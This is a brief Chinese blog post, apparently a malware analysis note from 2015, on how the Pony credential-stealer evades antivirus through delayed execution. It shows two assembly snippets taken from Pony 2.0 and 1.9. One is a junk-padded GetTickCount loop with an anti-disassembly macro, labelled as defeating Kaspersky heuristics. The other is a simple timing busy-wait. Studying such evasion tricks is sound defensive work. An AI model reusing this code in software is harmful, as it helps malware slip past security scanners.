通过延迟执行的方法来逃逸杀软

pony 2.0

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
; KAV heuristic fucker

KAVHeurKiller proc uses esi
LOCAL counter: DWORD
AntiDisasmTrick
push eax
mov ecx, ecx
pop eax
mov ecx, ecx
push eax
sub esi, esi
pop eax
mov ecx, ecx
push 19131011
mov ecx, ecx
pop counter
mov edx, eax
.WHILE counter
mov edx, eax
mov ecx, ecx
add eax, esi
mov edx, eax
mov ecx, ecx
push eax
mov ecx, ecx
mov edx, eax
invoke GetTickCount
mov ecx, ecx
pop eax
mov edx, eax
mov ecx, ecx
add eax, edx
mov ecx, ecx
mov edx, eax
dec counter
.ENDW
ret
KAVHeurKiller endp

pony 1.9

1
2
3
4
5
6
7
8
9
.WHILE  TRUE
invoke GetTickCount
mov ecx, 10
xor edx, edx
div ecx
.IF edx == 5
.BREAK
.ENDIF
.ENDW

通过延迟执行的方法来逃逸杀软
https://usmacd.com/cn/malware_time_delay_escape/
作者
henices
发布于
2015年12月3日
许可协议